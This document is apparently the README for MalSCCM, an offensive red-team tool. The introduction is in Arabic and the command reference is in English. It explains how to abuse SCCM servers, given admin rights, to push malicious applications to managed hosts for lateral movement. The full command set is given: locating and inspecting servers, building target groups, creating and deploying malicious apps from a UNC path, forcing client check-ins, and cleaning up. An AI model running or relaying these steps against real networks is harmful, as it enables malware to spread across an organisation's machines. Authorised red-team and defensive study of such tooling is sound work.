
استغلال خوادم SCCM لنشر تطبيقات ضارة على الأجهزة المُدارة للحركة الجانبية وعمليات الفريق الأحمر.
تتيح لك هذه الأداة استغلال خوادم SCCM المحلية أو البعيدة لنشر تطبيقات ضارة على المضيفين الذين تديرهم. لاستخدام هذه الأداة، يجب أن تتمتع عمليتك الحالية بحقوق المسؤول على خادم SCCM.
عادةً، في عمليات نشر SCCM، يكون خادم الإدارة والخادم الأساسي على نفس المضيف، وفي هذه الحالة يمكن استخدام المضيف الذي يعيده أمر locate كخادم أساسي.
إذا لم يكن الأمر كذلك، فستحتاج إلى اختراق مضيف الإدارة الذي تم إرجاعه بواسطة locate حتى تتمكن من تشغيل locate مرة أخرى على هذا المضيف والحصول على اسم مضيف الخادم الأساسي. بمجرد حصولك على ذلك وصول المسؤول، يمكنك المتابعة!
لمزيد من المعلومات حول استخدام الأداة، راجع المدونة أدناه.
شكر كبير لـ PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) التي يعتمد عليها هذا العمل بالكامل، لما أمكن إنجاز هذا العمل بدون جهود @harmj0y و@jaredcatkinson و@enigma0x3 و@mattifestation.
Commands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>